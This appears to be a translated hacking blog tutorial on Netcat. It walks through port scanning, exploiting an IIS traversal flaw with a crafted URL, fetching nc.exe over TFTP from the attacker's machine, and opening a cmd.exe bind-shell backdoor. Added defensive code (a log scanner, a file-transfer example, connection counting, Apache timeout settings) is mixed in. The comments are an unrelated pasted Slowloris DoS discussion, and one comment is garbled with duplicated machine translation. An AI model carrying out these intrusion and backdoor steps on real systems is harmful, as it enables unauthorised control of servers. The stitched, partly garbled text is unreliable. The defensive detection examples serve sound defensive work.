Hacking with Netcat

Written by Hacker7.bloger.cz, 10. 2. 2011, category: netcat, read 6475×

Download here: http://www.soom.cz/index.php?name=download/kategorie&sid=5

Then just copy it into C:\WINDOWS and everything should work.

NetCat is a utility that can send and receive data over TCP and UDP connections. NetCat can be used as a port scanner, backdoor, port redirector, port listener and for plenty of other cool things. It isn't always the best tool for the job, but if I ended up on a desert island I'd want to take NetCat with me. In this tutorial I'll demonstrate a complete hack using nothing but NetCat, to show how versatile a tool it is.

Port scanning with NetCat

We'll demonstrate scanning with the example "nc -v -w 2 -z target 20-30". NetCat will try to connect to every port between 20 and 30; -v gives verbose output and -w 2 sets a two-second timeout. The -z switch prevents sending data over a TCP connection and limits the data sent over a UDP connection. The -i switch inserts a delay between each port tried. Although NetCat can be used for port scanning, that isn't its strong point; tools like Nmap are far better at it.


We scanned 192.168.1.1, ports 1-200. Among others we can see that ports 80, 21 and 25 are open...



Banner grabbing with NetCat

Now we want to find out what is running on ports 80 and 21. To grab the banner we can use NetCat as follows.


So now we know it is probably a Windows 2000 system, because it is running IIS 5.0 and the Microsoft FTP Service.

Now let's send the server a crafted URL with which we'll try to exploit the "File Traversal vulnerability" on an unpatched server. We'll use NetCat for the attempt and, if it works, upload NetCat to the server and show how NetCat can be used as a backdoor.

If you don't know what the "Unicode File Traversal exploit" is, search the web for something like "IIS Unicode File Traversal". (It probably won't work any more these days, but for demonstrating NetCat it will do.)


Great! We sent the server the URL http://192.168.1.90/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c: to attack the IIS server, and what we see is a directory listing from the server's disk.

Excellent! Now we want to upload NetCat to the server. We'll use TFTP and embed the TFTP command in the crafted URL.


tftp -i 192.168.1.9 GET nc.exe

becomes:

http:///c+TFTP+-i+192.168.1.9+GET+nc.exe

So using the little TFTPD program we get NetCat onto the server.




NetCat as a backdoor

Now we have NetCat uploaded on the server and want to use it to create a backdoor so that we get a remote command prompt.
To use NetCat as a backdoor we need it to listen on some chosen port (we'll pick, say, port 10001) so that we can connect to it from our own machine... using NetCat again, of course :))

The command we send to the server looks something like this:

nc -L -p 10001 -d -e cmd.exe

And here is what it means:

nc -> launches NetCat
-L -> tells NetCat to wait for incoming connections
-p -> the port NetCat listens on
-d -> stealth mode
-e -> runs a program (cmd.exe) and waits for an incoming connection

Now, if we want to transform this command into a URL again:

http:///c+nc+-L+-p+10001+-d+-e+cmd.exe

And now all that remains is to launch NetCat for real...


Now we should have NetCat running and listening on port 10001. Next, from our machine, we connect to NetCat on the server.


We have a remote command prompt on the server and can control it fully.
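As an added defensive example (not code from the original article), here is a small Python scanner for IIS W3C-style log lines that decodes each request the way IIS 4/5 did and flags the traversal, cmd.exe, tftp and nc -e patterns that the walkthrough's URLs contain. The log lines are constructed, and the field order is an assumption (real logs declare it in a #Fields: header).

```python
"""Scan IIS W3C-format log lines for the double-encoded directory traversal and
the cmd.exe / tftp / nc command execution used in the walkthrough above.

Added defensive example for this page, not code from the original article.
The log lines are constructed; the assumed field order is
date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
(real logs list their fields in a #Fields: header, which real code should honour).
"""
import re
from collections import Counter
from urllib.parse import unquote

# Overlong UTF-8 sequences that IIS 4/5 accepted for '/' and '\' (the
# "Unicode" traversal); %255c is plain double percent-encoding of '\'.
OVERLONG = {"%c0%af": "/", "%c1%9c": "\\"}
TOOL_NAMES = {"tftp", "tftp.exe", "nc", "nc.exe"}

# Constructed sample log, mirroring the three requests the walkthrough sends.
SAMPLE_LOG = """\
2011-02-10 10:01:02 192.168.1.9 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir+c: 200
2011-02-10 10:02:15 192.168.1.9 GET /scripts/..%255c../winnt/system32/cmd.exe /c+TFTP+-i+192.168.1.9+GET+nc.exe 200
2011-02-10 10:03:40 192.168.1.9 GET /scripts/..%255c../winnt/system32/cmd.exe /c+nc+-L+-p+10001+-d+-e+cmd.exe 200
2011-02-10 10:04:01 192.168.1.20 GET /default.htm - 200
2011-02-10 10:05:11 192.168.1.21 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 404
2011-02-10 10:06:30 192.168.1.22 GET /images/logo.gif - 304
"""


def decode_uri(uri: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly (IIS decoded twice, hence %255c -> %5c -> '\\')
    and map the overlong sequences to the characters IIS turned them into."""
    s = uri
    for _ in range(max_rounds):
        for enc, ch in OVERLONG.items():
            # a function replacement avoids backslash escapes in the repl string
            s = re.sub(re.escape(enc), lambda _m, c=ch: c, s, flags=re.IGNORECASE)
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def analyze_line(line: str):
    """Return a finding record for one log line, or None if it looks benign."""
    if not line.strip() or line.startswith("#"):
        return None
    fields = line.split()
    if len(fields) < 7:
        return None
    _date, _time, c_ip, method, stem, query, status = fields[:7]
    path = decode_uri(stem)
    # In the walkthrough's URLs '+' separates the cmd.exe arguments.
    cmdline = decode_uri(query).replace("+", " ") if query != "-" else ""
    tokens = cmdline.lower().split()

    findings = []
    if re.search(r"\.\.[\\/]", path):
        findings.append("directory traversal")
    if "cmd.exe" in path.lower():
        findings.append("cmd.exe invocation")
    tools = TOOL_NAMES & set(tokens)
    if tools:
        findings.append("tool execution: " + ", ".join(sorted(tools)))
    if tools & {"nc", "nc.exe"} and "-e" in tokens:
        findings.append("netcat listener executing a program (-e)")
    if not findings:
        return None
    return {"ip": c_ip, "method": method, "status": int(status),
            "path": path, "cmdline": cmdline, "findings": findings}


def scan_log(text: str) -> list:
    """All suspicious records in a log, in file order."""
    return [hit for hit in (analyze_line(l) for l in text.splitlines()) if hit]


def hits_by_ip(hits) -> Counter:
    """How many suspicious requests each client address made."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f'{h["ip"]} {h["status"]} {h["path"]} {h["cmdline"]!r}: {"; ".join(h["findings"])}')
```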

File transfer with NetCat

Let's look at the other things NetCat can do. We want to transfer the file hack.txt to the server and for some reason can't use TFTP. We can use NetCat...

To receive the file hack.txt, NetCat on the server must be set up like this:

nc -l -p 1234 >hack.txt


From our computer we send the file like this:

nc destination 1234 <hack.txt


And this is what hack.txt looks like:


And... voilà!


We can see that hack.txt was successfully transferred to the server over port 1234.
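The same transfer in Python, as an added example that is not part of the original article: receiver and sender speak raw TCP exactly like the two nc commands above, on 127.0.0.1 with a port chosen by the OS, and the caller compares SHA-256 hashes afterwards, the integrity check netcat itself never performs.

```python
"""Raw TCP file transfer the way `nc -l -p 1234 >hack.txt` (receiver) and
`nc destination 1234 <hack.txt` (sender) do it, plus a hash comparison.
Added example for this page, not code from the article.  Everything runs on
127.0.0.1 on a port picked by the OS; the file content is constructed."""
import hashlib
import os
import socket
import tempfile
import threading


def receive_file(listener: socket.socket, out_path: str) -> int:
    """Accept one connection and write everything received to out_path.
    The stream carries no length or framing, so like `nc -l` the receiver
    only knows the file is complete when the sender closes its side."""
    conn, _peer = listener.accept()
    total = 0
    with conn, open(out_path, "wb") as out:
        while True:
            chunk = conn.recv(65536)
            if not chunk:          # EOF: the sender shut down its write side
                break
            out.write(chunk)
            total += len(chunk)
    return total


def send_file(host: str, port: int, in_path: str) -> int:
    """Stream in_path to host:port and signal EOF, as `nc host port <file` does."""
    sent = 0
    with socket.create_connection((host, port), timeout=10) as sock, \
            open(in_path, "rb") as src:
        while True:
            chunk = src.read(65536)
            if not chunk:
                break
            sock.sendall(chunk)
            sent += len(chunk)
        sock.shutdown(socket.SHUT_WR)  # the EOF the receiver is waiting for
    return sent


def sha256_of(path: str) -> str:
    """Hex SHA-256 of a file, read in blocks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(65536), b""):
            h.update(block)
    return h.hexdigest()


def transfer_demo(payload: bytes) -> dict:
    """Run receiver and sender on loopback; report byte counts and whether the
    hashes match.  Netcat alone gives you none of this verification."""
    workdir = tempfile.mkdtemp()
    src = os.path.join(workdir, "hack.txt")
    dst = os.path.join(workdir, "hack_received.txt")
    with open(src, "wb") as f:
        f.write(payload)

    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))      # port 0: let the OS pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]

    result = {}
    receiver = threading.Thread(
        target=lambda: result.update(received=receive_file(listener, dst)))
    receiver.start()
    sent = send_file("127.0.0.1", port, src)
    receiver.join(timeout=10)
    listener.close()
    return {"port": port, "sent": sent, "received": result.get("received"),
            "intact": sha256_of(src) == sha256_of(dst)}


if __name__ == "__main__":
    print(transfer_demo(b"hack.txt test content\n" * 2000))
```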


Comments

Trénuj from IP 74.120.12.*** | 25.5.2011 19:11
# RSnake Says:
June 17th, 2009 at 3:22 pm

@phoenix

mod_bandwidth only works with Apache 1.3.

mod_evasive does nothing to stop this unless it tells something else to firewall the user off. I didn't try every configuration but it doesn't appear to do much against Slowloris unless it communicates its problems to something that has a chance of dealing with it on Apache's behalf.
# lighty Says:
June 17th, 2009 at 3:43 pm

Did you test slowloris on other webserver stacks?

Like nginx, lighttpd, cherokee… which are more “high-performance” oriented webservers? Or are we just talking about an apache specific “DoS”?

Regards
# thrill Says:
June 17th, 2009 at 6:12 pm

@Matt Presson

How do you suggest blocking BySpoofedIP?
# blah Says:
June 17th, 2009 at 8:36 pm

Billy Hoffman AKA “Acidus”

“as an aside how is this not arming script kiddies?”

lol@arming. Maybe Bob doesn't want to end up like you, who does nothing but yap and never releases any code. I've heard you more than a DOZEN times say you would release something after a talk and never have. You're full of hot air. You have a rep based on talking fast.

teh kidz already have tens of thousands compromised machines, that's how his PERL SCRIPT isn't “arming” them.
# sirdarckcat Says:
June 17th, 2009 at 8:48 pm

mod_evasive sucks, and mod_bandwidth is broken.

your best bet is iptables and limit max simultaneous connections / ip.

anyway.. I think it's important to state clearly that what you are exhausting is apache's maxclients directive (I know that you cannot fix this just increasing the number, but what your attack is exhausting is that).

A friend showed this to me a couple of mins ago:
seclists.org/fulldisclosure/2009/Jun/0188.html

Just plain stupid, haha

Greetz!!
# id Says:
June 17th, 2009 at 9:05 pm

@sirdarckat

MaxClients is only what limits how long it takes to hang a site, and only by a few seconds max. Consider an average httpd process takes up between 3MB-10MB of ram, that's only 350-100 httpd processes per GB of ram. And the average server probably has 4-8GB right now, so even with a very high MaxClient setting the server would run out of physical ram with very few packets sent.

As for the FD guy…I hope he takes his blood pressure medicine…
# Wireghoul Says:
June 17th, 2009 at 9:13 pm

I'm surprised mod_choke hasn't been mentioned. Is it considered too “unstable”?

Also, spotted this typo on the slowloris page;
In considering the ramifcations of a slow denial of service attack against
# Christian Folini Says:
June 17th, 2009 at 11:08 pm

Very nice to see somebody write about this topic. The question has been raised on the apache users list in 2007. All we got from apache was the same stupid tips page, which ignores this particular problem completely. See the thread at tinyurl.com/mbkhr9

I did some research on this, but never actually released it. If somebody is interested in it, then get in touch with me at netnea.com.

Actually RSnake, you are going in the right direction with slowloris. However, there is a lot of room for additional nastiness. I.e. working with file uploads instead of http headers (http-headers limit you to a max connection duration of LimitRequestFields * Timeout), file uploads do not really have a connection duration limit. And from the way Apache works, just about anybody is allowed to _send_ in a file. Apache won't necessarily accept it, but as a start, it will try and swallow it completely. ModSecurity could help you a bit though.

What I have not tried out is hacking the ssl handshake. I am confident you would be able to get the same DoS effect and hide from the access log that way.

I am happy somebody with some leverage finally made this public. I've been sitting on my research on the topic for too long.
# aykay Says:
June 18th, 2009 at 12:21 am

There is already a way to define a maximum number of connections per source IP address. You even don't have to “tweak” mod_security to achieve that.
As an alternative to limiting max simultaneous connections with iptables you could use the apache module mod_qos (http://mod-qos.sourceforge.net/).
It can limit the number of concurrent connections for a single IP source address by defining the configuration option QS_SrvMaxConnPerIP.
mod_qos could also be configured to allow a server to support keep-alive as long as sufficient connections are free, but to disable the keep-alive support when a defined connection threshold (QS_SrvMaxConnClose) is reached.
# phoenix Says:
June 18th, 2009 at 12:46 am

@Rsnake > I did compile mod_bandwidth on Apache 2.2 with no problem
# Hugo Says:
June 18th, 2009 at 1:07 am

@Rsnake, how do you protect your webserver from that? I see that my ip got blacklisted after running slowloris.pl against ha.ckers.org. I guess you're running apache too, right?

slowloris.pl manpage says “lighthttpd” not affected, well, the webserver's name is “lighttpd” instead.
# Wladimir Palant Says:
June 18th, 2009 at 5:59 am

> Anyway, I hope this gets people thinking about better web server architecture.

Definitely. I used to run Apache - until a year ago my server simply went down due to memory exhaustion. Took me some time to figure out what was going on and that it wasn't a DoS attack. It was simply due to keep-alive being enabled on a directory where many clients downloaded a small file from. That resulted in tons of open connections (keep alive timeout was 150 seconds which used to be the default I guess) that weren't doing anything but just sitting there and wasting lots of memory. This finally made me install nginx and I still cannot believe how much difference that made. nginx uses a single-threaded approach which is both less wasteful and apparently allows for a far better performance if done correctly.
# Ralf Says:
June 18th, 2009 at 6:52 am

It's possible to retrieve the PID of the Apache process that serves the request:

ralf.stormbind.net/wp-content/uploads/2008/05/retrieve-remote-apache-pid.txt

This may be (or maybe not, I don't know) useful in slowloris to calculate the load (e.g. many non-unique pids -> much load) of the server.
# kmike Says:
June 18th, 2009 at 6:59 am

Yes, it's interesting if this type of attack is effective against the state machine-based web servers such as nginx or lighttpd.
Also, Nginx can limit the number of connections per IP (don't know if lighttpd has a similar feature), thus more attacking IPs are needed to achieve the same result.
# Zac B Says:
June 18th, 2009 at 7:13 am

Kudos on finding a problem… and kudos to the commenters finally getting over the knee jerk reaction and getting to the meat of the matter.

Actually, I'd like to comment on the discussion (and not the DoS issue) cause I think people may miss the opportunity to learn valuable lessons from this: “fix or mitigate the problem *first*” & “don't take it personally”.

You don't like that someone finds a problem? Tough. Saying that it's nothing new and that other issues 'do the same thing' isn't helping. The fact of the matter is that 'do the same thing' doesn't mean 'does it the same way'. Fix/mitigate the new issue.

Example (albeit extreme): Bullets kill people; poison kills people. Bullet-proof vests mitigate bullets… not so much for poison (though it does depend on the delivery mechanism for the poison). Just because the end result of these two threats are the same does not make the methods and protections the same.

Don't take issues personally. This is like arguing over which hammer is best… but if all you need to do is put a nail in a wall, does it really matter if you use a 14oz smooth-headed claw hammer with a wood handle instead of a 20oz drywaller's hammer with a metal shaft? Not one bit.

So, just cause someone finds a flaw in your favorite app/tool/os doesn't mean they are attacking you or even your favorite app/tool/os. In fact you should greet this revelation with a smile cause usually it'll mean things will improve.

RSnake has done a great service to the Apache community and I agree that the response from Apache of RTFM was insufficient.

BTW: before you flame me for being off topic - my current specialty (aka: my day job) is Security Analyst and not Web/Server admin, so other than mastering multiple ways to say the word “no” I have to daily look at the 'how' of responses and see if the 'how' can be improved.
# Zac B Says:
June 18th, 2009 at 7:15 am

damn straight… though there is one other option: not to read our posts after clicking on the 'submit' button. : P

# Acidus Says:
June 17th, 2009 at 11:30 am

sweet jesus Firefox needs to a grammar checker to tis speel checker. Or I need to learn English. Hmmm I know which is more likely
# MaXe Says:
June 18th, 2009 at 10:52 am

Very nice RSnake, I really appreciate when PoC's like this are released. It helps me learn and understand more about computers (and programming, no matter how poor my best hello_world() are).

Keep up the good work!

Best Regards,
MaXe
# GeorgZ Says:
June 18th, 2009 at 11:02 am

I guess the actual “idea” is *really* old (> 5 years). It reminds me of Lutz Donnerhacke's “Teergrube” (SMTP) for slowing down spammers.
I agree that something like MaxClientsPerIp should be present in Apache, but unless you figure out why IIS behaves more “intelligent”, I would just say that Apache is more tolerant for slow clients.
# rvdh Says:
June 18th, 2009 at 6:52 pm

There are more roads that lead to Rome:

httpd.apache.org/docs/1.3/misc/fin_wait_2.html
# id Says:
June 18th, 2009 at 9:23 pm

Couple more suggestions of “solutions” that I tested today.
cband - nope
MPM worker - nope
dosevasive - couldn't find the source, if anyone has a pointer I'll try it.

Also, there's been a large percentage of posters on this, and various other forums, saying it's a very old/well known/easily defended against issue. However no one has posted a link to any code that does the slow and low bandwidth approach. I'd be interested to see the code, and compare the various suggested protections.

I am also very curious to know why, if this is so well known, it isn't commonly used in attacks (this site has had quite a few DoSings, none similar). Maybe it's because everyone else (except every site we've tried) is implementing their super secret protections they aren't sharing?
# Roland Dobbins Says:
June 18th, 2009 at 10:50 pm

I've read through all of this, and through the TCP vectors discussed in the latest Phrack, and I see absolutely *nothing* new here from either a conceptual or an actualization standpoint. All these things and more have been seen in the wild for a decade or more (by me personally, I'm not reporting second- or third-hand).

It's good to see that folks in the security research/infosec communities are finally starting to think about DDoS and all its implications, but the concept of prior art is still apparently something few security researchers (and academics, for that matter) seem to grasp. Before investing the time and effort to write a tool which duplicates attacks seen over and over again in the wild by operational security (opsec) folks, and before making an announcement that something is new and different which in actuality has been seen and dealt with by others over and over again, a bit of due diligence ought to be undertaken, IMHO.

Also, note that there are in fact quite a few countermeasures for dealing with such attacks, including architecture, configuration, and even dedicated DDoS mitigation devices [full disclosure; I work for a company which makes such devices]. It's also important to note that, far from providing any materially useful security benefit, load-balancers actually tend to increase vulnerability to DDoS due to all the state they instantiate, and so it's important to ensure that one's various reaction mechanisms (S/RTBH, dedicated DDoS mitigation devices, et. al.) are located northbound of the load-balancers so as to protect them as well as the load-balanced instances southbound of them.

This in no way diminishes the value of discussion
# sirdarckcat Says:
June 18th, 2009 at 11:30 pm

> super secret protections they aren't sharing
well, they are *very easy* to implement, but ok..

In my case I've used several ways depending on the day (if the weather is hot, I dont use perl, if the weather is cold I dont use python, so I used bash), this is an extract from a cronjob running every 5 minutes on the webserver.. with a very simple script that detected plain-dumb same-ip attacks (there are further iptables rules limiting the amount of new connections per minute, so the attack of exhausting maxclients from the same IP is impossible in less than 5 minutes):

# bloke999 style dos
netstat -an | grep ':80 .*ESTABLISHED' | sed 's/^.*ffff://' | tr : ' ' | awk '{a[$1]++ } END{for(i in a){if(a[i]>10)print "-I INPUT -s " i " -j DROP"}}' > /home/sdc/export/iptables_bloke.txt
# dec2006 style dos
netstat -an | grep ':80 .*TIME_WAIT' | sed 's/^.*ffff://' | tr : ' ' | awk '{a[$1]++ } END{for(i in a){if(a[i]>30)print "-I INPUT -s " i " -j DROP"}}' > /home/sdc/export/iptables_wait.txt

I have another python script running on the DNS server polling /server-status doing the same (with a higher frequency), but instead of dropping the packets it configures the server to respond differently to those IPs, pointing the domains to 192.168.0.1 (the ttl is low).

I dont know why no one attacks ckers.org with this technique but at least they have attacked me, and a friend's forum like this several times.

A lot of websites are easy to DoS like this.. I sincerely can't think on any public tool that does this, so I understand why the “new” word can be used to describe slowloris.

Anyway, smile

Greetings!!
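The per-IP counting that the two one-liners in the comment above do, as an added Python example (not the commenter's code) over constructed netstat output; it generalises them slightly: one pass counts ESTABLISHED and TIME_WAIT peers of port 80, strips the ::ffff: prefix of IPv4-mapped addresses, and ignores connections to other local ports.

```python
"""Per-source-IP connection counting over `netstat -an` output, the check the
cron job above does with grep, sed and awk.  Added example, not the
commenter's code; the netstat lines are constructed.  One pass handles both
ESTABLISHED and TIME_WAIT, strips the ::ffff: prefix of IPv4-mapped
addresses, and only counts connections to the chosen local port."""
import re
from collections import Counter

NETSTAT_LINE = re.compile(r"^tcp6?\s+\d+\s+\d+\s+(\S+)\s+(\S+)\s+([A-Z_]+)\s*$")
THRESHOLDS = {"ESTABLISHED": 10, "TIME_WAIT": 30}   # strictly greater, as in the awk


def _constructed_netstat() -> str:
    """Constructed `netstat -an` output: one noisy peer per state, one quiet
    peer, and a batch of SSH connections that must not be counted."""
    header = [
        "Active Internet connections (servers and established)",
        "Proto Recv-Q Send-Q Local Address           Foreign Address         State",
        "tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN",
    ]
    rows = [f"tcp        0      0 10.0.0.5:80             203.0.113.7:{51000 + i}       ESTABLISHED"
            for i in range(12)]
    rows += [f"tcp        0      0 10.0.0.5:80             198.51.100.4:{52000 + i}      ESTABLISHED"
             for i in range(3)]
    rows += [f"tcp6       0      0 ::ffff:10.0.0.5:80      ::ffff:203.0.113.9:{40000 + i} TIME_WAIT"
             for i in range(35)]
    rows += [f"tcp        0      0 10.0.0.5:22             203.0.113.7:{53000 + i}       ESTABLISHED"
             for i in range(20)]   # port 22, outside the web-server check
    return "\n".join(header + rows) + "\n"


SAMPLE_NETSTAT = _constructed_netstat()


def peer_ip(addr: str) -> str:
    """'::ffff:203.0.113.9:40001' -> '203.0.113.9'; '203.0.113.7:51001' -> '203.0.113.7'."""
    if addr.startswith("::ffff:"):
        addr = addr[len("::ffff:"):]
    return addr.rsplit(":", 1)[0]


def count_peers(netstat_output: str, local_port: int = 80) -> dict:
    """Counter of foreign IPs per tracked state, for sockets on local_port."""
    counts = {state: Counter() for state in THRESHOLDS}
    for line in netstat_output.splitlines():
        m = NETSTAT_LINE.match(line)
        if not m:
            continue
        local, foreign, state = m.groups()
        if state not in counts or not local.endswith(f":{local_port}"):
            continue
        counts[state][peer_ip(foreign)] += 1
    return counts


def offenders(netstat_output: str, local_port: int = 80, thresholds=THRESHOLDS) -> dict:
    """Per state, the sorted (ip, count) pairs above that state's threshold."""
    counts = count_peers(netstat_output, local_port)
    return {state: sorted((ip, n) for ip, n in counts[state].items() if n > limit)
            for state, limit in thresholds.items()}


def iptables_rules(offending: dict) -> list:
    """Rule lines in the format the cron job writes out for iptables."""
    ips = sorted({ip for pairs in offending.values() for ip, _ in pairs})
    return [f"-I INPUT -s {ip} -j DROP" for ip in ips]


if __name__ == "__main__":
    found = offenders(SAMPLE_NETSTAT)
    print(found)
    print("\n".join(iptables_rules(found)))
```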
# Hugo Says:
June 19th, 2009 at 5:47 am

The remedy: www.hiawatha-webserver.org/
# Paul Says:
June 19th, 2009 at 6:09 am

@ Every limelight-wanting researcher.

Who gives a damn if it's been discussed before? I certainly don't. I'm just a hobbyist who's curious about how things work, things like Apache. Robert isn't trying to take credit. You'll notice it wasn't him who posted this on FD, which is a den of attention whores, skiddies who talk about how elite they are because they discovered Amazon has an XSS vuln, and fly-by-night security firms pushing their latest whitepaper.

But I digress…

In trying this out (I must stress the -test flag, not actual attacks) I found an interesting general rule: If it involves money and it's large, 90 percent of the time it's around 100 seconds. If it's a personal site, only 10 percent of the time does it not go to 500.

RSnake: I got the script to seg fault. Where do I report it or possibly submit improvements and, while I understand you're busy, will you update this script?
# Charles Darke Says:
June 19th, 2009 at 8:08 am

it may well be used in 'real' attacks. But since reducing timeout or using other countermeasures can defeat this attack, the attack must degenerate into a standard DOS attack to remain effective.
# RSnake Says:
June 19th, 2009 at 8:55 am

@Paul - do you mean that Perl segfaulted? I don't see how my program could manage to do that by itself. But yes, if there's some changes that would make the program better, just email them to me. My email address is on the about us page.

And welcome slashdot!
# Paul Says:
June 19th, 2009 at 9:40 am

It could have. I just set it up on the box I was testing it on and haven't set up perl in a while. Probably was one of the script's dependencies. Could have been the fact I was running it through torify to see if it would be feasible to do this attack through tor (providing an instant proxy).

I'll try to reproduce it. Thanks. And don't listen to the kids saying you rip off others' work.

And congrats on being slashdotted (again, IIRC). I have your blog RSS'd so I had it first
# EternaL Says:
June 19th, 2009 at 10:42 am

Oh my god, what a nice tool !!!

Great job dude, really surprised you share it for free.
Anyway, good work!

Regards.
# RSnake Says:
June 19th, 2009 at 10:49 am

Apache's take on this issue (part two) - still not worth thinking about. They closed the bug that this guy opened: issues.apache.org/bugzilla/show_bug.cgi?id=47386
# karavelov Says:
June 19th, 2009 at 11:22 am

I have tested this DOS attack against lighttpd and nginx. Out of the box both servers are vulnerable (despite the note in the announcement that lighttpd is not vulnerable, just use a large enough number of connections). Nginx could be configured to not be affected by this type of attack:
Put in “http” section:

client_body_timeout 10;
client_header_timeout 10;
keepalive_timeout 10;
send_timeout 10;
limit_zone limit_per_ip $binary_remote_addr 1m;

#and put in “server” section :
limit_conn limit_per_ip 16;

the last lines are for limiting connection numbers per client IP.

May be lighttpd could be configured in a similar manner but I am not a spec in it.

Best regards
# RSnake Says:
June 19th, 2009 at 11:32 am

Incidentally we have a new working theory. Our theory is that no Apache module as it stands right now can fix this. We tried mod_security's “drop” on a single IP address, which should send a FIN immediately upon seeing that IP address. Unfortunately it too was unable to stop this. I think possibly the Apache modules are just called too late. We tried the same thing with .htaccess denys but that only denies once the connection is complete, and mod_security runs after .htaccess. I can't confirm this theory but maybe someone who is more familiar with Apache internals can.
# RSnake Says:
June 19th, 2009 at 11:36 am

Ivan Ristic confirmed that mod_security runs too late, although it still might be possible to write a module that can defend against this. He also confirmed that there are no good workarounds built into any existing modules that he is aware of - or even to simpler DoS scenarios as well. It's been something he's wanted to write, but it doesn't currently exist.
# RSnake Says:
June 19th, 2009 at 11:37 am

@karavelov - can you tell us what configuration of Slowloris you used? Perhaps my defaults weren't well suited for attacking those…?
# Joe Says:
June 19th, 2009 at 11:41 am

Why wouldn't setting keep alives to a lower number help here?
# Wireghoul Says:
June 19th, 2009 at 12:46 pm

@RSnake @id

Did you try mod_choke? If your distro doesn't already have it, consult modules.apache.org/ for source
# RSnake Says: RSnake říká:
June 19th, 2009 at 1:05 pm 19.června 2009 v 13:05

@Wireghoul - nope but we can try it out. @ Wireghoul - Ne, ale můžeme to vyzkoušet.

For those if you who are following this we've looked at pretty much everything you can possibly do with your Apache config and we've been trying all of your suggestions. Pro ty, kteří jsou-li na základě tohoto jsme se podíval na skoro všechno, co můžete udělat s vaším Apache config a my se to snažíme všechny vaše návrhy. One guy on slashdot mentioned this configuration so we tried it out and it looks like it solves the _default_ Slowloris attack: Jeden chlap na Slashdot se zmínil o tomto nastavení, takže jsme se snažili ho a vypadá to, že řeší _default_ Slowloris útok:

Timeout 5 Timeout 5
KeepAliveTimeout 0 KeepAliveTimeout 0

The problem is if you set -timeout to 4 Slowloris wins again (assuming fairly low latency). Problém je, pokud si set-timeout na 4 Slowloris vyhraje znovu (za předpokladu, že poměrně nízká latence). It's all about how long you allow the socket to stay open. Je to všechno o tom, jak dlouho vám umožní zůstat otevřené zásuvky. This will break all kinds of stuff by doing this though, as Acidus mentioned above. To bude přestávka všechny druhy věcí, které dělá to i když, jak acidus je uvedeno výše.
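For the Apache side of the problem discussed in this comment, here is an added configuration example; it is not from the thread and not RSnake's or the Apache project's own text. It relies on mod_reqtimeout, which did not exist when this thread was written (it shipped with httpd 2.2.15), and the numeric values are illustrative assumptions rather than tested settings.

```apache
# Added example, not from the thread. Requires mod_reqtimeout (httpd 2.2.15+);
# the numbers below are illustrative assumptions, tune them for your latency.
LoadModule reqtimeout_module modules/mod_reqtimeout.so

# Headers: allow 20 s for the full header block to arrive; every 500 bytes
# received extends that limit by 1 s, but never beyond 40 s in total. A client
# trickling one byte every few seconds therefore hits the 40 s cap regardless
# of how often it sends. The request body gets the same treatment.
RequestReadTimeout header=20-40,MinRate=500 body=20,MinRate=500

# Timeout (the per-read idle limit the thread was tuning) can then stay at a
# value that does not break slow but legitimate clients, instead of 4-5 s.
Timeout 30
KeepAliveTimeout 5
```

The difference from the Timeout/KeepAliveTimeout approach is exactly the one the thread keeps running into: Timeout restarts on every read, so a client that sends a byte just before it expires never trips it, whereas RequestReadTimeout bounds the whole header phase and only grows that bound while data keeps arriving at a minimum rate.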
# Tim McGuire Says:
June 19th, 2009 at 2:31 pm

I tested this against tomcat and as expected it works great ( from vmware ).
# Ed Says:
June 19th, 2009 at 2:51 pm

How is this possible ?

“If your server used UDP and I re-wrote Slowloris to speak UDP it would work too.”

gaia.cs.umass.edu/kurose/transport/UDP.html
# RSnake Says:
June 19th, 2009 at 2:54 pm

@Ed MINA is just one example - www.ashishpaliwal.com/blog/2008/10/what-is-apache-mina/ Most of the UDP web servers I've seen are experimental. I was only speaking hypothetically.
# Ed Says:
June 19th, 2009 at 2:58 pm

@RSnake, hypothetically how would you hold a connectionless protocol's connection open? DNS uses udp/tcp, let's say your requests are
# Ed Says:
June 19th, 2009 at 2:58 pm

oops less than 512K
# RSnake Says:
June 19th, 2009 at 3:00 pm

@Ed - I'd hold them open in the same way however that UDP service naturally held them open. UDP is stateless but that doesn't mean whatever is supervising it has to be stateless. In the same way that HTTP is stateless - we've invented cookies that the browser and the server use between them to create state over a stateless protocol.
# Jay Says:
June 19th, 2009 at 4:34 pm

Does anyone have the iptables rule to slow/stop this attack?
# Pablo Says:
June 19th, 2009 at 6:14 pm

Hi there, I'm a member of cherokee's mailing list and I received a message from one of the cherokee guys saying that he performed a DoS attack on a cherokee server using this technique and it passed the test!
I can't guarantee this but I trust the community.
So, consider adding it to your list ;)
For those that thought of giving cherokee a chance… Give it! I fell in love the first time I used it.
Cheers
# Mike Adewole Says:
June 19th, 2009 at 6:35 pm

The solution to this problem is actually what separates web sites from web applications in my opinion: request serialization.

If a web server is designed to serve web sites, like apache is designed to do, then the server will attempt to serve multiple requests simultaneously without serializing the requests in any way(eg by ip address).

On the other hand, a web server that is designed to serve web applications (like the custom server running www.botslist.ca ) should serialize the requests so that multiple requests from the same ip (and/or port depending on the environment) are served by the same thread. That thread will then use the http host header and session token to serve the request within the proper user context/state.

In a web application server as described above, if the requests queue for an ip address fills up, further requests from the same ip will be rejected with a timeout error which will inform legitimate browsers (even if they are behind forward/reverse proxies) to retry the request again. Other clients like your slowloris will just get a whole bunch of timeout errors without blocking access to the web application for other clients.

Apache falls for this hack simply because it does not serialize requests. So in a certain sense, it is indeed an architectural flaw in apache.
# RLoxley Says:
June 19th, 2009 at 6:55 pm

Can i use this to hack hotmail? woohhooo, haha
# Phil D Says:
June 19th, 2009 at 7:22 pm

What about mod_limitipconn? Could you give it a test run?

Apache 1.x: dominia.org/djao/limitipconn.html
Apache 2.x: dominia.org/djao/limitipconn2.html
# adrianilarionciobanu Says:
June 19th, 2009 at 11:55 pm

there always was a tool (and some detailed description) here: pub.mud.ro/~cia/computing/apache-httpd-denial-of-service-example.html :) (with small compile-time errors explicitly coded)
